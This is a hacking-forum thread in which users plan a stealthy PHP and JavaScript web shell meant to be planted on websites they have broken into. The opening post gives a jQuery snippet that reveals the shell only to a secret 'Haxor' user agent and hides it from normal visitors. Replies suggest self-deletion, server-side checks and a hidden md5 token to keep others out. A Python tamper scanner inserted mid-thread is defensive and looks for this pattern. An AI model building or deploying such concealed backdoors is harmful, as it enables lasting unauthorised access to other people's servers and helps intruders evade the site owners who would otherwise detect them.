Building a PHP shell, come join me!

shell
phpshell
stealth
javascript

#1

Hello peepz,

Been a while since I last posted something.
Have been very busy with my Computer Science studies, which I started this year.

Anyway:

A few days ago my Dummies book: ‘HTML5, CSS, JavaScript, PHP and MySQL for Dummies’.
So I’ve gone through most of the book now and decided it was time to write a PHP + JavaScript shell.
I opened a GitHub repo which can be found here:
EDIT:
https://git.0x00sec.org/unh0lys0da/PHPshell/tree/master

So if anyone wants to help me, please go ahead!
The idea is as follows:

This piece of code is inserted in a normal page of the website you hacked.
Of course the page should be one that doesn’t create too much traffic.
Now the idea is that it checks the user agent of the visitor.
As you can see here:

        // Only reveal the shell when the visitor's user agent is the agreed string.
        if( navigator.userAgent == "Haxor" ) {
            $("#haxored").prop("hidden", false);      // show the shell container
            $("#luserContent").prop("hidden", true);  // hide the page's normal content
        }

This way, users with normal user agents (for example people browsing with Firefox) don’t see the shell.
But if you set your user agent string in your browser to “Haxor” you can see the shell!

Now this is only the beginning of the code, all parts are yet unfinished.

If anyone feels like working on this project, please let me know!

IoTh1nkN0t (Previously unh0lys0da)

Update:

This is how the shell looks now:

@pry0cc You do real MVP


(Command-Line Ninja) #2

That is a boss idea! I’m getting in on that.

How would you allow it to avoid detection? Perhaps get the JavaScript code to delete itself? You would need jQuery…


#3

It’s already got jQuery ^^
Ehm, yeah, well, if you look at the source of the webpage you’ll find, no matter what, that the page is not the original.
But you could do it with PHP.

Hmm, that poses a real challenge.

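The point raised above, that a page carrying the shell is no longer the original, is what a defender can check for. The following is an added example (not code from the thread or its repository): it compares deployed files against a known-good hash manifest and flags changed files that contain the user-agent-gated hiding pattern from the first post (a literal `navigator.userAgent` comparison plus a `hidden` toggle) or a server-side user-agent check. The sample pages and file names are constructed.

```python
import hashlib
import re

# Patterns taken from the snippet in the first post: a literal comparison against
# navigator.userAgent, and toggling of the `hidden` property on page elements.
UA_GATE = re.compile(r'navigator\.userAgent\s*[!=]==?\s*["\']', re.I)
HIDDEN_TOGGLE = re.compile(r'\.prop\(\s*["\']hidden["\']|\.hidden\s*=\s*(?:true|false)', re.I)
# Server-side equivalents: the raw header, or get_browser() as mentioned later in the thread.
PHP_UA_CHECK = re.compile(r'\$_SERVER\[\s*["\']HTTP_USER_AGENT["\']\s*\]|\bget_browser\s*\(', re.I)

def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()

def build_manifest(files: dict[str, str]) -> dict[str, str]:
    """Hash every deployed file (path -> content) into a path -> digest manifest."""
    return {path: sha256_text(body) for path, body in files.items()}

def changed_files(baseline: dict[str, str], files: dict[str, str]) -> list[str]:
    """Paths whose digest differs from the known-good manifest, or that are new."""
    current = build_manifest(files)
    return sorted(p for p, h in current.items() if baseline.get(p) != h)

def ua_gate_markers(source: str) -> list[str]:
    """Which user-agent-gating markers a file's source carries (empty list if none)."""
    markers = []
    if UA_GATE.search(source):
        markers.append('js-useragent-gate')
    if HIDDEN_TOGGLE.search(source):
        markers.append('js-hidden-toggle')
    if PHP_UA_CHECK.search(source):
        markers.append('php-useragent-check')
    return markers

def scan(baseline: dict[str, str], files: dict[str, str]) -> dict[str, list[str]]:
    """Report every modified or added file together with the markers it carries."""
    return {p: ua_gate_markers(files[p]) for p in changed_files(baseline, files)}

# Constructed sample: a known-good page, and the same page after a UA-gated block was inserted.
ORIGINAL = '<html><body><div id="content">Welcome</div></body></html>\n'
TAMPERED = ORIGINAL.replace('</body>', '''<div id="haxored" hidden></div>
<script>if (navigator.userAgent == "Haxor") { $("#haxored").prop("hidden", false); }</script>
</body>''')

def demo() -> dict[str, list[str]]:
    baseline = build_manifest({'index.php': ORIGINAL, 'about.php': ORIGINAL})
    deployed = {'index.php': TAMPERED, 'about.php': ORIGINAL}
    return scan(baseline, deployed)  # only index.php changed, and it carries both JS markers

if __name__ == '__main__':
    for path, markers in demo().items():
        print(path, markers)
```

An unchanged file is never reported even if it legitimately reads the user agent; a changed file with no markers is still listed so it can be diffed by hand.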

(Command-Line Ninja) #4

I’ve just got it. Docker doesn’t seem to be working on my local box so I need to get that sorted to test it out.


(Command-Line Ninja) #5

Grazia IO! What’s next?


(zusheng-security) #6

Hello, this is a good project, I hope to join. Do you know GitHub?


(Command-Line Ninja) #7

We have our own GitLab server. You can find that in the link provided in the article.


(zusheng-security) #8

Sorry, I did not see, thank you.


(Burning away in an Explosion) #9

There is a PHP function named get_browser for it. Everything else than server-based wouldn’t make sense. Not that big a challenge, but ok :smile:


(3,4,5-trimethoxyphenethylamine) #10

I’ve just seen your code and I think you should make it as server-sided as you can. You’re relying on JavaScript to do most of the work, which makes it hackable. If you need something just text me.


(X2tf) #11

We are having shell access here, which means we have already hacked the site. We have to make it more client side to make it look less suspicious. (You didn’t want to add files that can confirm your attack. Did you? :stuck_out_tongue_winking_eye: )


(Command-Line Ninja) #12

Firstly. We are not relying on JavaScript to do most of the work. We have a backend (PHP), to do server side functions, and then the front-end (JavaScript) to do client side functions.

The compartmentalisation is sound. Since it’s using the backend as an API it would be possible to write a CLI client for it. Heck. Write an iPhone app. All it has to do is call the PHP script with a get request.

Secondly, @_k_h is 100% correct. It’s a shell xD therefore you aren’t going to gain much by hacking it. In fact. You won’t gain anything. If you could hack it for more functionality we would actually implement those features into the shell :joy:


(3,4,5-trimethoxyphenethylamine) #13

I didn’t think of that from that perspective, I guess you’re kinda right.


#14

Hi, I would like to help you on this project. It looks very interesting. I also have a few ideas for you. Maybe you should use the native XHR API for issuing requests from the client side. You use jQuery in your code from a third-party CDN for building only one request. Also, you can set some kind of hard-coded md5 token in a PHP doc comment. You can then send a string/word in the Authorization header from the client. On the server side you hash that word with md5 and compare it with the token in the PHP doc using reflection. This way you have implemented single-factor authentication and only you can use the shell. Tell me what you think about my ideas.


(Command-Line Ninja) #15

That’s a very good idea. In fact, that’s miles ahead of the user agent idea.

If you’d like to implement it, fork the repo on GitLab and then issue a pull request. I’m sure we’ll accept it :slight_smile:

